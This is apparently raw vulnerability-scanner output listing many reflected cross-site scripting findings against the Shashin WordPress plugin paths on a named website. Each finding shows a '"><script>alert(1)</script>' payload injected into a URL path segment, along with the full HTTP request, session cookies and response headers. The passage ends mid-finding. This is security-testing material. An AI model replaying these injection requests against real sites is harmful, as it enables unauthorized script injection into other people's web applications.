HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:21 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73558"><script>alert(1)</script>ef682b01297 was submitted in the REST URL parameter 4. This input was echoed as 73558\"><script>alert(1)</script>ef682b01297 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display73558"><script>alert(1)</script>ef682b01297/highslide/graphics/zoomout.cur HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:33 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63ec6"><script>alert(1)</script>0f1429f41fc was submitted in the REST URL parameter 5. This input was echoed as 63ec6\"><script>alert(1)</script>0f1429f41fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslide63ec6"><script>alert(1)</script>0f1429f41fc/graphics/zoomout.cur HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:41 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c19"><script>alert(1)</script>a14f94d58e1 was submitted in the REST URL parameter 6. This input was echoed as b1c19\"><script>alert(1)</script>a14f94d58e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslide/graphicsb1c19"><script>alert(1)</script>a14f94d58e1/zoomout.cur HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:46 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593ac"><script>alert(1)</script>e6b3473958a was submitted in the REST URL parameter 7. This input was echoed as 593ac\"><script>alert(1)</script>e6b3473958a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslide/graphics/zoomout.cur593ac"><script>alert(1)</script>e6b3473958a HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:50 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51865"><script>alert(1)</script>36c3af1a628 was submitted in the REST URL parameter 1. This input was echoed as 51865\"><script>alert(1)</script>36c3af1a628 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content51865"><script>alert(1)</script>36c3af1a628/plugins/shashin/display/highslide/highslide.js?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:24 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a44f0"><script>alert(1)</script>b433535b039 was submitted in the REST URL parameter 2. This input was echoed as a44f0\"><script>alert(1)</script>b433535b039 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsa44f0"><script>alert(1)</script>b433535b039/shashin/display/highslide/highslide.js?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:51 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:52 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd142"><script>alert(1)</script>4d9a95a7d1a was submitted in the REST URL parameter 3. This input was echoed as cd142\"><script>alert(1)</script>4d9a95a7d1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashincd142"><script>alert(1)</script>4d9a95a7d1a/display/highslide/highslide.js?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:03 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd7a1"><script>alert(1)</script>9e8358628c was submitted in the REST URL parameter 4. This input was echoed as cd7a1\"><script>alert(1)</script>9e8358628c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/displaycd7a1"><script>alert(1)</script>9e8358628c/highslide/highslide.js?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:23 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e7a"><script>alert(1)</script>ff499529adf was submitted in the REST URL parameter 5. This input was echoed as d0e7a\"><script>alert(1)</script>ff499529adf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslided0e7a"><script>alert(1)</script>ff499529adf/highslide.js?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:33 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dd3"><script>alert(1)</script>086fea328ce was submitted in the REST URL parameter 6. This input was echoed as a8dd3\"><script>alert(1)</script>086fea328ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslide/highslide.jsa8dd3"><script>alert(1)</script>086fea328ce?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:40 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbe88"><script>alert(1)</script>f7328fe3fd was submitted in the REST URL parameter 1. This input was echoed as cbe88\"><script>alert(1)</script>f7328fe3fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentcbe88"><script>alert(1)</script>f7328fe3fd/plugins/shashin/display/highslide_settings.js?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:19 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:19 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59ed"><script>alert(1)</script>e7457cb1118 was submitted in the REST URL parameter 2. This input was echoed as e59ed\"><script>alert(1)</script>e7457cb1118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginse59ed"><script>alert(1)</script>e7457cb1118/shashin/display/highslide_settings.js?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:39 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7963"><script>alert(1)</script>8fab0df5b25 was submitted in the REST URL parameter 3. This input was echoed as f7963\"><script>alert(1)</script>8fab0df5b25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashinf7963"><script>alert(1)</script>8fab0df5b25/display/highslide_settings.js?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:53 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 571fd"><script>alert(1)</script>1f6db69054f was submitted in the REST URL parameter 4. This input was echoed as 571fd\"><script>alert(1)</script>1f6db69054f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display571fd"><script>alert(1)</script>1f6db69054f/highslide_settings.js?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:07 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a58"><script>alert(1)</script>056b9f92904 was submitted in the REST URL parameter 5. This input was echoed as 13a58\"><script>alert(1)</script>056b9f92904 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslide_settings.js13a58"><script>alert(1)</script>056b9f92904?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:23 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 838d6"><script>alert(1)</script>4da7ad5524 was submitted in the REST URL parameter 1. This input was echoed as 838d6\"><script>alert(1)</script>4da7ad5524 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content838d6"><script>alert(1)</script>4da7ad5524/plugins/shashin/display/shashin.css?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:05 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db61d"><script>alert(1)</script>79fc3cacd0a was submitted in the REST URL parameter 2. This input was echoed as db61d\"><script>alert(1)</script>79fc3cacd0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
